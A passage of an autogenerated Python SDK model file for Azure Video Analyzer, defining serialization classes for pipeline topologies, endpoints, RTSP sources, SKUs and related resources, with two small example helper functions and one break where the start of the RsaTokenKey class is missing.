Topology parameters with a default value can optionally be overridden. :type parameters: list[~video_analyzer.models.ParameterDefinition] """ _validation = { 'id': {'readonly': True}, 'name': {'readonly': True}, 'type': {'readonly': True}, 'system_data': {'readonly': True}, 'state': {'readonly': True}, 'expiration': {'readonly': True}, 'error': {'readonly': True}, } _attribute_map = { 'id': {'key': 'id', 'type': 'str'}, 'name': {'key': 'name', 'type': 'str'}, 'type': {'key': 'type', 'type': 'str'}, 'system_data': {'key': 'systemData', 'type': 'SystemData'}, 'topology_name': {'key': 'properties.topologyName', 'type': 'str'}, 'description': {'key': 'properties.description', 'type': 'str'}, 'state': {'key': 'properties.state', 'type': 'str'}, 'expiration': {'key': 'properties.expiration', 'type': 'iso-8601'}, 'error': {'key': 'properties.error', 'type': 'PipelineJobError'}, 'parameters': {'key': 'properties.parameters', 'type': '[ParameterDefinition]'}, } def __init__( self, **kwargs ): super(PipelineJobUpdate, self).__init__(**kwargs) self.topology_name = kwargs.get('topology_name', None) self.description = kwargs.get('description', None) self.state = None self.expiration = None self.error = None self.parameters = kwargs.get('parameters', None) class PipelineTopology(ProxyResource): """Pipeline topology describes the processing steps to be applied when processing content for a particular outcome. The topology should be defined according to the scenario to be achieved and can be reused across many pipeline instances which share the same processing characteristics. For instance, a pipeline topology which captures content from an RTSP camera and archives the content can be reused across many different cameras, as long as the same processing is to be applied across all the cameras. Individual instance properties can be defined through the use of user-defined parameters, which allow for a topology to be parameterized. This allows individual pipelines to refer to different values, such as individual cameras' RTSP endpoints and credentials. Overall a topology is composed of the following: * Parameters: list of user defined parameters that can be referenced across the topology nodes. * Sources: list of one or more data source nodes such as an RTSP source which allows for content to be ingested from cameras. * Processors: list of nodes which perform data analysis or transformations. * Sinks: list of one or more data sinks which allow for data to be stored or exported to other destinations. Variables are only populated by the server, and will be ignored when sending a request. All required parameters must be populated in order to send to Azure. :ivar id: Fully qualified resource ID for the resource. Ex - /subscriptions/{subscriptionId}/resourceGroups/{resourceGroupName}/providers/{resourceProviderNamespace}/{resourceType}/{resourceName}. :vartype id: str :ivar name: The name of the resource. :vartype name: str :ivar type: The type of the resource. E.g. "Microsoft.Compute/virtualMachines" or "Microsoft.Storage/storageAccounts". :vartype type: str :ivar system_data: Azure Resource Manager metadata containing createdBy and modifiedBy information. :vartype system_data: ~video_analyzer.models.SystemData :param kind: Required. Topology kind. Possible values include: "Live", "Batch". :type kind: str or ~video_analyzer.models.Kind :param sku: Required. Describes the properties of a SKU. :type sku: ~video_analyzer.models.Sku :param description: An optional description of the pipeline topology.
It is recommended that the expected use of the topology be described here. :type description: str :param parameters: List of the topology parameter declarations. Parameters declared here can be referenced throughout the topology nodes through the use of "${PARAMETER_NAME}" string pattern. Parameters can have optional default values and can later be defined in individual instances of the pipeline. :type parameters: list[~video_analyzer.models.ParameterDeclaration] :param sources: List of the topology source nodes. Source nodes enable external data to be ingested by the pipeline. :type sources: list[~video_analyzer.models.SourceNodeBase] :param processors: List of the topology processor nodes. Processor nodes enable pipeline data to be analyzed, processed or transformed. :type processors: list[~video_analyzer.models.ProcessorNodeBase] :param sinks: List of the topology sink nodes. Sink nodes allow pipeline data to be stored or exported. :type sinks: list[~video_analyzer.models.SinkNodeBase] """ _validation = { 'id': {'readonly': True}, 'name': {'readonly': True}, 'type': {'readonly': True}, 'system_data': {'readonly': True}, 'kind': {'required': True}, 'sku': {'required': True}, } _attribute_map = { 'id': {'key': 'id', 'type': 'str'}, 'name': {'key': 'name', 'type': 'str'}, 'type': {'key': 'type', 'type': 'str'}, 'system_data': {'key': 'systemData', 'type': 'SystemData'}, 'kind': {'key': 'kind', 'type': 'str'}, 'sku': {'key': 'sku', 'type': 'Sku'}, 'description': {'key': 'properties.description', 'type': 'str'}, 'parameters': {'key': 'properties.parameters', 'type': '[ParameterDeclaration]'}, 'sources': {'key': 'properties.sources', 'type': '[SourceNodeBase]'}, 'processors': {'key': 'properties.processors', 'type': '[ProcessorNodeBase]'}, 'sinks': {'key': 'properties.sinks', 'type': '[SinkNodeBase]'}, } def __init__( self, **kwargs ): super(PipelineTopology, self).__init__(**kwargs) self.kind = kwargs['kind'] self.sku = kwargs['sku'] self.description = kwargs.get('description', None) self.parameters = kwargs.get('parameters', None) self.sources = kwargs.get('sources', None) self.processors = kwargs.get('processors', None) self.sinks = kwargs.get('sinks', None) class PipelineTopologyCollection(msrest.serialization.Model): """A collection of PipelineTopology items. :param value: A collection of PipelineTopology items. :type value: list[~video_analyzer.models.PipelineTopology] :param next_link: A link to the next page of the collection (when the collection contains too many results to return in one response). :type next_link: str """ _attribute_map = { 'value': {'key': 'value', 'type': '[PipelineTopology]'}, 'next_link': {'key': '@nextLink', 'type': 'str'}, } def __init__( self, **kwargs ): super(PipelineTopologyCollection, self).__init__(**kwargs) self.value = kwargs.get('value', None) self.next_link = kwargs.get('next_link', None)
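# Illustrative sketch (not part of the generated models): a partial update that
# only changes a topology's description. A full PipelineTopology additionally
# requires 'kind' and 'sku' plus source and sink nodes; PipelineTopologyUpdate,
# defined just below, leaves every property optional, and the name resolves at
# call time.
def _example_pipeline_topology_update():
    """Return a sample PipelineTopologyUpdate carrying only a new description."""
    return PipelineTopologyUpdate(description='Tuned for nightly batch processing.')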
class PipelineTopologyUpdate(ProxyResource): """Pipeline topology describes the processing steps to be applied when processing content for a particular outcome. The topology should be defined according to the scenario to be achieved and can be reused across many pipeline instances which share the same processing characteristics. For instance, a pipeline topology which captures content from an RTSP camera and archives the content can be reused across many different cameras, as long as the same processing is to be applied across all the cameras. Individual instance properties can be defined through the use of user-defined parameters, which allow for a topology to be parameterized. This allows individual pipelines to refer to different values, such as individual cameras' RTSP endpoints and credentials. Overall a topology is composed of the following: * Parameters: list of user defined parameters that can be referenced across the topology nodes. * Sources: list of one or more data source nodes such as an RTSP source which allows for content to be ingested from cameras. * Processors: list of nodes which perform data analysis or transformations. * Sinks: list of one or more data sinks which allow for data to be stored or exported to other destinations. Variables are only populated by the server, and will be ignored when sending a request. :ivar id: Fully qualified resource ID for the resource. Ex - /subscriptions/{subscriptionId}/resourceGroups/{resourceGroupName}/providers/{resourceProviderNamespace}/{resourceType}/{resourceName}. :vartype id: str :ivar name: The name of the resource. :vartype name: str :ivar type: The type of the resource. E.g. "Microsoft.Compute/virtualMachines" or "Microsoft.Storage/storageAccounts". :vartype type: str :ivar system_data: Azure Resource Manager metadata containing createdBy and modifiedBy information. :vartype system_data: ~video_analyzer.models.SystemData :param kind: Topology kind. Possible values include: "Live", "Batch". :type kind: str or ~video_analyzer.models.Kind :param sku: Describes the properties of a SKU. :type sku: ~video_analyzer.models.Sku :param description: An optional description of the pipeline topology. It is recommended that the expected use of the topology be described here. :type description: str :param parameters: List of the topology parameter declarations. Parameters declared here can be referenced throughout the topology nodes through the use of "${PARAMETER_NAME}" string pattern. Parameters can have optional default values and can later be defined in individual instances of the pipeline. :type parameters: list[~video_analyzer.models.ParameterDeclaration] :param sources: List of the topology source nodes. Source nodes enable external data to be ingested by the pipeline. :type sources: list[~video_analyzer.models.SourceNodeBase] :param processors: List of the topology processor nodes. Processor nodes enable pipeline data to be analyzed, processed or transformed. :type processors: list[~video_analyzer.models.ProcessorNodeBase] :param sinks: List of the topology sink nodes. Sink nodes allow pipeline data to be stored or exported.
:type sinks: list[~video_analyzer.models.SinkNodeBase] """ _validation = { 'id': {'readonly': True}, 'name': {'readonly': True}, 'type': {'readonly': True}, 'system_data': {'readonly': True}, } _attribute_map = { 'id': {'key': 'id', 'type': 'str'}, 'name': {'key': 'name', 'type': 'str'}, 'type': {'key': 'type', 'type': 'str'}, 'system_data': {'key': 'systemData', 'type': 'SystemData'}, 'kind': {'key': 'kind', 'type': 'str'}, 'sku': {'key': 'sku', 'type': 'Sku'}, 'description': {'key': 'properties.description', 'type': 'str'}, 'parameters': {'key': 'properties.parameters', 'type': '[ParameterDeclaration]'}, 'sources': {'key': 'properties.sources', 'type': '[SourceNodeBase]'}, 'processors': {'key': 'properties.processors', 'type': '[ProcessorNodeBase]'}, 'sinks': {'key': 'properties.sinks', 'type': '[SinkNodeBase]'}, } def __init__( self, **kwargs ): super(PipelineTopologyUpdate, self).__init__(**kwargs) self.kind = kwargs.get('kind', None) self.sku = kwargs.get('sku', None) self.description = kwargs.get('description', None) self.parameters = kwargs.get('parameters', None) self.sources = kwargs.get('sources', None) self.processors = kwargs.get('processors', None) self.sinks = kwargs.get('sinks', None) class PrivateEndpoint(msrest.serialization.Model): """The Private Endpoint resource. Variables are only populated by the server, and will be ignored when sending a request. :ivar id: The ARM identifier for Private Endpoint. :vartype id: str """ _validation = { 'id': {'readonly': True}, } _attribute_map = { 'id': {'key': 'id', 'type': 'str'}, } def __init__( self, **kwargs ): super(PrivateEndpoint, self).__init__(**kwargs) self.id = None class PrivateEndpointConnection(Resource): """The Private Endpoint Connection resource. Variables are only populated by the server, and will be ignored when sending a request. :ivar id: Fully qualified resource ID for the resource. Ex - /subscriptions/{subscriptionId}/resourceGroups/{resourceGroupName}/providers/{resourceProviderNamespace}/{resourceType}/{resourceName}. :vartype id: str :ivar name: The name of the resource. :vartype name: str :ivar type: The type of the resource. E.g. "Microsoft.Compute/virtualMachines" or "Microsoft.Storage/storageAccounts". :vartype type: str :ivar system_data: Azure Resource Manager metadata containing createdBy and modifiedBy information. :vartype system_data: ~video_analyzer.models.SystemData :param private_endpoint: The resource of the private endpoint. :type private_endpoint: ~video_analyzer.models.PrivateEndpoint :param private_link_service_connection_state: A collection of information about the state of the connection between service consumer and provider. :type private_link_service_connection_state: ~video_analyzer.models.PrivateLinkServiceConnectionState :ivar provisioning_state: The provisioning state of the private endpoint connection resource. Possible values include: "Succeeded", "Creating", "Deleting", "Failed".
:vartype provisioning_state: str or ~video_analyzer.models.PrivateEndpointConnectionProvisioningState """ _validation = { 'id': {'readonly': True}, 'name': {'readonly': True}, 'type': {'readonly': True}, 'system_data': {'readonly': True}, 'provisioning_state': {'readonly': True}, } _attribute_map = { 'id': {'key': 'id', 'type': 'str'}, 'name': {'key': 'name', 'type': 'str'}, 'type': {'key': 'type', 'type': 'str'}, 'system_data': {'key': 'systemData', 'type': 'SystemData'}, 'private_endpoint': {'key': 'properties.privateEndpoint', 'type': 'PrivateEndpoint'}, 'private_link_service_connection_state': {'key': 'properties.privateLinkServiceConnectionState', 'type': 'PrivateLinkServiceConnectionState'}, 'provisioning_state': {'key': 'properties.provisioningState', 'type': 'str'}, } def __init__( self, **kwargs ): super(PrivateEndpointConnection, self).__init__(**kwargs) self.private_endpoint = kwargs.get('private_endpoint', None) self.private_link_service_connection_state = kwargs.get('private_link_service_connection_state', None) self.provisioning_state = None class PrivateEndpointConnectionListResult(msrest.serialization.Model): """List of private endpoint connections associated with the specified storage account. :param value: Array of private endpoint connections. :type value: list[~video_analyzer.models.PrivateEndpointConnection] """ _attribute_map = { 'value': {'key': 'value', 'type': '[PrivateEndpointConnection]'}, } def __init__( self, **kwargs ): super(PrivateEndpointConnectionListResult, self).__init__(**kwargs) self.value = kwargs.get('value', None) class PrivateLinkResource(Resource): """A private link resource. Variables are only populated by the server, and will be ignored when sending a request. :ivar id: Fully qualified resource ID for the resource. Ex - /subscriptions/{subscriptionId}/resourceGroups/{resourceGroupName}/providers/{resourceProviderNamespace}/{resourceType}/{resourceName}. :vartype id: str :ivar name: The name of the resource. :vartype name: str :ivar type: The type of the resource. E.g. "Microsoft.Compute/virtualMachines" or "Microsoft.Storage/storageAccounts". :vartype type: str :ivar system_data: Azure Resource Manager metadata containing createdBy and modifiedBy information. :vartype system_data: ~video_analyzer.models.SystemData :ivar group_id: The private link resource group id. :vartype group_id: str :ivar required_members: The private link resource required member names. :vartype required_members: list[str] :param required_zone_names: The private link resource Private link DNS zone name. :type required_zone_names: list[str] """ _validation = { 'id': {'readonly': True}, 'name': {'readonly': True}, 'type': {'readonly': True}, 'system_data': {'readonly': True}, 'group_id': {'readonly': True}, 'required_members': {'readonly': True}, } _attribute_map = { 'id': {'key': 'id', 'type': 'str'}, 'name': {'key': 'name', 'type': 'str'}, 'type': {'key': 'type', 'type': 'str'}, 'system_data': {'key': 'systemData', 'type': 'SystemData'}, 'group_id': {'key': 'properties.groupId', 'type': 'str'}, 'required_members': {'key': 'properties.requiredMembers', 'type': '[str]'}, 'required_zone_names': {'key': 'properties.requiredZoneNames', 'type': '[str]'}, } def __init__( self, **kwargs ): super(PrivateLinkResource, self).__init__(**kwargs) self.group_id = None self.required_members = None self.required_zone_names = kwargs.get('required_zone_names', None) class PrivateLinkResourceListResult(msrest.serialization.Model): """A list of private link resources.
:param value: Array of private link resources. :type value: list[~video_analyzer.models.PrivateLinkResource] """ _attribute_map = { 'value': {'key': 'value', 'type': '[PrivateLinkResource]'}, } def __init__( self, **kwargs ): super(PrivateLinkResourceListResult, self).__init__(**kwargs) self.value = kwargs.get('value', None) class PrivateLinkServiceConnectionState(msrest.serialization.Model): """A collection of information about the state of the connection between service consumer and provider. :param status: Indicates whether the connection has been Approved/Rejected/Removed by the owner of the service. Possible values include: "Pending", "Approved", "Rejected". :type status: str or ~video_analyzer.models.PrivateEndpointServiceConnectionStatus :param description: The reason for approval/rejection of the connection. :type description: str :param actions_required: A message indicating if changes on the service provider require any updates on the consumer. :type actions_required: str """ _attribute_map = { 'status': {'key': 'status', 'type': 'str'}, 'description': {'key': 'description', 'type': 'str'}, 'actions_required': {'key': 'actionsRequired', 'type': 'str'}, } def __init__( self, **kwargs ): super(PrivateLinkServiceConnectionState, self).__init__(**kwargs) self.status = kwargs.get('status', None) self.description = kwargs.get('description', None) self.actions_required = kwargs.get('actions_required', None) class Properties(msrest.serialization.Model): """Metric properties. Variables are only populated by the server, and will be ignored when sending a request. :ivar service_specification: The service specifications. :vartype service_specification: ~video_analyzer.models.ServiceSpecification """ _validation = { 'service_specification': {'readonly': True}, } _attribute_map = { 'service_specification': {'key': 'serviceSpecification', 'type': 'ServiceSpecification'}, } def __init__( self, **kwargs ): super(Properties, self).__init__(**kwargs) self.service_specification = None class ResourceIdentity(msrest.serialization.Model): """The user assigned managed identity to use when accessing a resource. All required parameters must be populated in order to send to Azure. :param user_assigned_identity: Required. The user assigned managed identity's resource identifier to use when accessing a resource. :type user_assigned_identity: str """ _validation = { 'user_assigned_identity': {'required': True}, } _attribute_map = { 'user_assigned_identity': {'key': 'userAssignedIdentity', 'type': 'str'}, } def __init__( self, **kwargs ): super(ResourceIdentity, self).__init__(**kwargs) self.user_assigned_identity = kwargs['user_assigned_identity']
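# Illustrative sketch (not part of the generated models): JWT validation
# configured with a single RSA signing key. The issuer, audience, key id,
# modulus and exponent values are placeholders; RsaTokenKey is defined just
# below and resolves at call time, and 'RS256' is one of its documented
# algorithm values.
def _example_jwt_authentication():
    """Return a sample JwtAuthentication holding one RSA validation key."""
    return JwtAuthentication(
        issuers=['https://issuer.contoso.example'],
        audiences=['https://videoanalyzer.contoso.example'],
        keys=[RsaTokenKey(kid='signing-key-1', alg='RS256', n='<base64url-encoded-modulus>', e='AQAB')],
    )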
    :type e: str
    """

    _validation = {
        'type': {'required': True},
        'kid': {'required': True},
        'alg': {'required': True},
        'n': {'required': True},
        'e': {'required': True},
    }

    _attribute_map = {
        'type': {'key': '@type', 'type': 'str'},
        'kid': {'key': 'kid', 'type': 'str'},
        'alg': {'key': 'alg', 'type': 'str'},
        'n': {'key': 'n', 'type': 'str'},
        'e': {'key': 'e', 'type': 'str'},
    }

    def __init__(
        self,
        **kwargs
    ):
        super(RsaTokenKey, self).__init__(**kwargs)
        self.type = '#Microsoft.VideoAnalyzer.RsaTokenKey'  # type: str
        self.alg = kwargs['alg']
        self.n = kwargs['n']
        self.e = kwargs['e']


class SourceNodeBase(NodeBase):
    """Base class for topology source nodes.

    You probably want to use the sub-classes and not this class directly. Known
    sub-classes are: RtspSource, VideoSource.

    All required parameters must be populated in order to send to Azure.

    :param type: Required. The discriminator for derived types. Constant filled by server.
    :type type: str
    :param name: Required. Node name. Must be unique within the topology.
    :type name: str
    """

    _validation = {
        'type': {'required': True},
        'name': {'required': True},
    }

    _attribute_map = {
        'type': {'key': '@type', 'type': 'str'},
        'name': {'key': 'name', 'type': 'str'},
    }

    _subtype_map = {
        'type': {'#Microsoft.VideoAnalyzer.RtspSource': 'RtspSource', '#Microsoft.VideoAnalyzer.VideoSource': 'VideoSource'}
    }

    def __init__(
        self,
        **kwargs
    ):
        super(SourceNodeBase, self).__init__(**kwargs)
        self.type = '#Microsoft.VideoAnalyzer.SourceNodeBase'  # type: str


class RtspSource(SourceNodeBase):
    """RTSP source allows for media from an RTSP camera or generic RTSP server to be ingested into
    a pipeline.

    All required parameters must be populated in order to send to Azure.

    :param type: Required. The discriminator for derived types. Constant filled by server.
    :type type: str
    :param name: Required. Node name. Must be unique within the topology.
    :type name: str
    :param transport: Network transport utilized by the RTSP and RTP exchange: TCP or HTTP. When
     using TCP, the RTP packets are interleaved on the TCP RTSP connection. When using HTTP, the
     RTSP messages are exchanged through long-lived HTTP connections, and the RTP packets are
     interleaved in the HTTP connections alongside the RTSP messages. Possible values include:
     "Http", "Tcp".
    :type transport: str or ~video_analyzer.models.RtspTransport
    :param endpoint: Required. RTSP endpoint information for Video Analyzer to connect to. This
     contains the required information for Video Analyzer to connect to RTSP cameras and/or
     generic RTSP servers.
    :type endpoint: ~video_analyzer.models.EndpointBase
    """

    _validation = {
        'type': {'required': True},
        'name': {'required': True},
        'endpoint': {'required': True},
    }

    _attribute_map = {
        'type': {'key': '@type', 'type': 'str'},
        'name': {'key': 'name', 'type': 'str'},
        'transport': {'key': 'transport', 'type': 'str'},
        'endpoint': {'key': 'endpoint', 'type': 'EndpointBase'},
    }

    def __init__(
        self,
        **kwargs
    ):
        super(RtspSource, self).__init__(**kwargs)
        self.type = '#Microsoft.VideoAnalyzer.RtspSource'  # type: str
        self.transport = kwargs.get('transport', None)
        self.endpoint = kwargs['endpoint']


class TunnelBase(msrest.serialization.Model):
    """Base class for tunnel objects.

    You probably want to use the sub-classes and not this class directly. Known
    sub-classes are: SecureIotDeviceRemoteTunnel.

    All required parameters must be populated in order to send to Azure.

    :param type: Required. The discriminator for derived types. Constant filled by server.
:type type: str """ _validation = { 'type': {'required': True}, } _attribute_map = { 'type': {'key': '@type', 'type': 'str'}, } _subtype_map = { 'type': {'#Microsoft.VideoAnalyzer.SecureIotDeviceRemoteTunnel': 'SecureIotDeviceRemoteTunnel'} } def __init__( self, **kwargs ): super(TunnelBase, self).__init__(**kwargs) self.type = None # type: Optional[str] class SecureIotDeviceRemoteTunnel(TunnelBase): """A remote tunnel securely established using IoT Hub device information. All required parameters must be populated in order to send to Azure. :param type: Required. The discriminator for derived types.Constant filled by server. :type type: str :param iot_hub_name: Required. Name of the IoT Hub. :type iot_hub_name: str :param device_id: Required. The IoT device id to use when establishing the remote tunnel. This string is case-sensitive. :type device_id: str """ _validation = { 'type': {'required': True}, 'iot_hub_name': {'required': True}, 'device_id': {'required': True}, } _attribute_map = { 'type': {'key': '@type', 'type': 'str'}, 'iot_hub_name': {'key': 'iotHubName', 'type': 'str'}, 'device_id': {'key': 'deviceId', 'type': 'str'}, } def __init__( self, **kwargs ): super(SecureIotDeviceRemoteTunnel, self).__init__(**kwargs) self.type = '#Microsoft.VideoAnalyzer.SecureIotDeviceRemoteTunnel' # type: str self.iot_hub_name = kwargs['iot_hub_name'] self.device_id = kwargs['device_id'] class ServiceSpecification(msrest.serialization.Model): """The service metric specifications. Variables are only populated by the server, and will be ignored when sending a request. :ivar log_specifications: List of log specifications. :vartype log_specifications: list[~video_analyzer.models.LogSpecification] :ivar metric_specifications: List of metric specifications. :vartype metric_specifications: list[~video_analyzer.models.MetricSpecification] """ _validation = { 'log_specifications': {'readonly': True}, 'metric_specifications': {'readonly': True}, } _attribute_map = { 'log_specifications': {'key': 'logSpecifications', 'type': '[LogSpecification]'}, 'metric_specifications': {'key': 'metricSpecifications', 'type': '[MetricSpecification]'}, } def __init__( self, **kwargs ): super(ServiceSpecification, self).__init__(**kwargs) self.log_specifications = None self.metric_specifications = None class SinkNodeBase(NodeBase): """Base class for topology sink nodes. You probably want to use the sub-classes and not this class directly. Known sub-classes are: VideoSink. All required parameters must be populated in order to send to Azure. :param type: Required. The discriminator for derived types.Constant filled by server. :type type: str :param name: Required. Node name. Must be unique within the topology. :type name: str :param inputs: Required. An array of upstream node references within the topology to be used as inputs for this node. :type inputs: list[~video_analyzer.models.NodeInput] """ _validation = { 'type': {'required': True}, 'name': {'required': True}, 'inputs': {'required': True}, } _attribute_map = { 'type': {'key': '@type', 'type': 'str'}, 'name': {'key': 'name', 'type': 'str'}, 'inputs': {'key': 'inputs', 'type': '[NodeInput]'}, } _subtype_map = { 'type': {'#Microsoft.VideoAnalyzer.VideoSink': 'VideoSink'} } def __init__( self, **kwargs ): super(SinkNodeBase, self).__init__(**kwargs) self.type = '#Microsoft.VideoAnalyzer.SinkNodeBase' # type: str self.inputs = kwargs['inputs'] class Sku(msrest.serialization.Model): """The SKU details. 
Variables are only populated by the server, and will be ignored when sending a request. All required parameters must be populated in order to send to Azure. :param name: Required. The SKU name. Possible values include: "Live_S1", "Batch_S1". :type name: str or ~video_analyzer.models.SkuName :ivar tier: The SKU tier. Possible values include: "Standard". :vartype tier: str or ~video_analyzer.models.SkuTier """ _validation = { 'name': {'required': True}, 'tier': {'readonly': True}, } _attribute_map = { 'name': {'key': 'name', 'type': 'str'}, 'tier': {'key': 'tier', 'type': 'str'}, } def __init__( self, **kwargs ): super(Sku, self).__init__(**kwargs) self.name = kwargs['name'] self.tier = None class StorageAccount(msrest.serialization.Model): """The details about the associated storage account. Variables are only populated by the server, and will be ignored when sending a request. All required parameters must be populated in order to send to Azure. :param id: Required. The ID of the storage account resource. Video Analyzer relies on tables, queues, and blobs. The primary storage account must be a Standard Storage account (either Microsoft.ClassicStorage or Microsoft.Storage). :type id: str :param identity: A managed identity that Video Analyzer will use to access the storage account. :type identity: ~video_analyzer.models.ResourceIdentity :ivar status: The current status of the storage account mapping. :vartype status: str """ _validation = { 'id': {'required': True}, 'status': {'readonly': True}, } _attribute_map = { 'id': {'key': 'id', 'type': 'str'}, 'identity': {'key': 'identity', 'type': 'ResourceIdentity'}, 'status': {'key': 'status', 'type': 'str'}, } def __init__( self, **kwargs ): super(StorageAccount, self).__init__(**kwargs) self.id = kwargs['id'] self.identity = kwargs.get('identity', None) self.status = None class SystemData(msrest.serialization.Model): """Metadata pertaining to creation and last modification of the resource. :param created_by: The identity that created the resource. :type created_by: str :param created_by_type: The type of identity that created the resource. Possible values include: "User", "Application", "ManagedIdentity", "Key". :type created_by_type: str or ~video_analyzer.models.CreatedByType :param created_at: The timestamp of resource creation (UTC). :type created_at: ~datetime.datetime :param last_modified_by: The identity that last modified the resource. :type last_modified_by: str :param last_modified_by_type: The type of identity that last modified the resource. Possible values include: "User", "Application", "ManagedIdentity", "Key". :type last_modified_by_type: str or ~video_analyzer.models.CreatedByType :param last_modified_at: The timestamp of resource last modification (UTC). 
:type last_modified_at: ~datetime.datetime """ _attribute_map = { 'created_by': {'key': 'createdBy', 'type': 'str'}, 'created_by_type': {'key': 'createdByType', 'type': 'str'}, 'created_at': {'key': 'createdAt', 'type': 'iso-8601'}, 'last_modified_by': {'key': 'lastModifiedBy', 'type': 'str'}, 'last_modified_by_type': {'key': 'lastModifiedByType', 'type': 'str'}, 'last_modified_at': {'key': 'lastModifiedAt', 'type': 'iso-8601'}, } def __init__( self, **kwargs ): super(SystemData, self).__init__(**kwargs) self.created_by = kwargs.get('created_by', None) self.created_by_type = kwargs.get('created_by_type', None) self.created_at = kwargs.get('created_at', None) self.last_modified_by = kwargs.get('last_modified_by', None) self.last_modified_by_type = kwargs.get('last_modified_by_type', None) self.last_modified_at = kwargs.get('last_modified_at', None) class TimeSequenceBase(msrest.serialization.Model): """A sequence of datetime ranges as a string. You probably want to use the sub-classes and not this class directly. Known sub-classes are: VideoSequenceAbsoluteTimeMarkers. All required parameters must be populated in order to send to Azure. :param type: Required. The discriminator for derived types.Constant filled by server. :type type: str """ _validation = { 'type': {'required': True}, } _attribute_map = { 'type': {'key': '@type', 'type': 'str'}, } _subtype_map = { 'type': {'#Microsoft.VideoAnalyzer.VideoSequenceAbsoluteTimeMarkers': 'VideoSequenceAbsoluteTimeMarkers'} } def __init__( self, **kwargs ): super(TimeSequenceBase, self).__init__(**kwargs) self.type = None # type: Optional[str] class TlsEndpoint(EndpointBase): """TLS endpoint describes an endpoint that the pipeline can connect to over TLS transport (data is encrypted in transit). All required parameters must be populated in order to send to Azure. :param type: Required. The discriminator for derived types.Constant filled by server. :type type: str :param credentials: Required. Credentials to be presented to the endpoint. :type credentials: ~video_analyzer.models.CredentialsBase :param url: Required. The endpoint URL for Video Analyzer to connect to. :type url: str :param tunnel: Describes the tunnel through which Video Analyzer can connect to the endpoint URL. This is an optional property, typically used when the endpoint is behind a firewall. :type tunnel: ~video_analyzer.models.TunnelBase :param trusted_certificates: List of trusted certificate authorities when authenticating a TLS connection. A null list designates that Azure Video Analyzer's list of trusted authorities should be used. :type trusted_certificates: ~video_analyzer.models.CertificateSource :param validation_options: Validation options to use when authenticating a TLS connection. By default, strict validation is used. 
:type validation_options: ~video_analyzer.models.TlsValidationOptions """ _validation = { 'type': {'required': True}, 'credentials': {'required': True}, 'url': {'required': True}, } _attribute_map = { 'type': {'key': '@type', 'type': 'str'}, 'credentials': {'key': 'credentials', 'type': 'CredentialsBase'}, 'url': {'key': 'url', 'type': 'str'}, 'tunnel': {'key': 'tunnel', 'type': 'TunnelBase'}, 'trusted_certificates': {'key': 'trustedCertificates', 'type': 'CertificateSource'}, 'validation_options': {'key': 'validationOptions', 'type': 'TlsValidationOptions'}, } def __init__( self, **kwargs ): super(TlsEndpoint, self).__init__(**kwargs) self.type = '#Microsoft.VideoAnalyzer.TlsEndpoint' # type: str self.trusted_certificates = kwargs.get('trusted_certificates', None) self.validation_options = kwargs.get('validation_options', None) class TlsValidationOptions(msrest.serialization.Model): """Options for controlling the validation of TLS endpoints. :param ignore_hostname: When set to 'true' causes the certificate subject name validation to be skipped. Default is 'false'. :type ignore_hostname: str :param ignore_signature: When set to 'true' causes the certificate chain trust validation to be skipped. Default is 'false'. :type ignore_signature: str """ _attribute_map = { 'ignore_hostname': {'key': 'ignoreHostname', 'type': 'str'}, 'ignore_signature': {'key': 'ignoreSignature', 'type': 'str'}, } def __init__( self, **kwargs ): super(TlsValidationOptions, self).__init__(**kwargs) self.ignore_hostname = kwargs.get('ignore_hostname', None) self.ignore_signature = kwargs.get('ignore_signature', None) class TokenClaim(msrest.serialization.Model): """Properties for expected token claims. All required parameters must be populated in order to send to Azure. :param name: Required. Name of the claim which must be present on the token. :type name: str :param value: Required. Expected value of the claim to be present on the token. :type value: str """ _validation = { 'name': {'required': True}, 'value': {'required': True}, } _attribute_map = { 'name': {'key': 'name', 'type': 'str'}, 'value': {'key': 'value', 'type': 'str'}, } def __init__( self, **kwargs ): super(TokenClaim, self).__init__(**kwargs) self.name = kwargs['name'] self.value = kwargs['value'] class TrackedResource(Resource): """The resource model definition for an Azure Resource Manager tracked top level resource which has 'tags' and a 'location'. Variables are only populated by the server, and will be ignored when sending a request. All required parameters must be populated in order to send to Azure. :ivar id: Fully qualified resource ID for the resource. Ex - /subscriptions/{subscriptionId}/resourceGroups/{resourceGroupName}/providers/{resourceProviderNamespace}/{resourceType}/{resourceName}. :vartype id: str :ivar name: The name of the resource. :vartype name: str :ivar type: The type of the resource. E.g. "Microsoft.Compute/virtualMachines" or "Microsoft.Storage/storageAccounts". :vartype type: str :ivar system_data: Azure Resource Manager metadata containing createdBy and modifiedBy information. :vartype system_data: ~video_analyzer.models.SystemData :param tags: A set of tags. Resource tags. :type tags: dict[str, str] :param location: Required. The geo-location where the resource lives. 
    :type location: str
    """

    _validation = {
        'id': {'readonly': True},
        'name': {'readonly': True},
        'type': {'readonly': True},
        'system_data': {'readonly': True},
        'location': {'required': True},
    }

    _attribute_map = {
        'id': {'key': 'id', 'type': 'str'},
        'name': {'key': 'name', 'type': 'str'},
        'type': {'key': 'type', 'type': 'str'},
        'system_data': {'key': 'systemData', 'type': 'SystemData'},
        'tags': {'key': 'tags', 'type': '{str}'},
        'location': {'key': 'location', 'type': 'str'},
    }

    def __init__(
        self,
        **kwargs
    ):
        super(TrackedResource, self).__init__(**kwargs)
        self.tags = kwargs.get('tags', None)
        self.location = kwargs['location']


class UnsecuredEndpoint(EndpointBase):
    """Unsecured endpoint describes an endpoint that the pipeline can connect to over clear
    transport (no encryption in transit).

    All required parameters must be populated in order to send to Azure.

    :param type: Required. The discriminator for derived types. Constant filled by server.
    :type type: str
    :param credentials: Required. Credentials to be presented to the endpoint.
    :type credentials: ~video_analyzer.models.CredentialsBase
    :param url: Required. The endpoint URL for Video Analyzer to connect to.
    :type url: str
    :param tunnel: Describes the tunnel through which Video Analyzer can connect to the endpoint
     URL. This is an optional property, typically used when the endpoint is behind a firewall.
    :type tunnel: ~video_analyzer.models.TunnelBase
    """

    _validation = {
        'type': {'required': True},
        'credentials': {'required': True},
        'url': {'required': True},
    }

    _attribute_map = {
        'type': {'key': '@type', 'type': 'str'},
        'credentials': {'key': 'credentials', 'type': 'CredentialsBase'},
        'url': {'key': 'url', 'type': 'str'},
        'tunnel': {'key': 'tunnel', 'type': 'TunnelBase'},
    }

    def __init__(
        self,
        **kwargs
    ):
        super(UnsecuredEndpoint, self).__init__(**kwargs)
        self.type = '#Microsoft.VideoAnalyzer.UnsecuredEndpoint'  # type: str


class UserAssignedManagedIdentity(msrest.serialization.Model):
    """The details of the user assigned managed identity used by the Video Analyzer resource.

    Variables are only populated by the server, and will be ignored when sending a request.

    :ivar client_id: The client ID.
    :vartype client_id: str
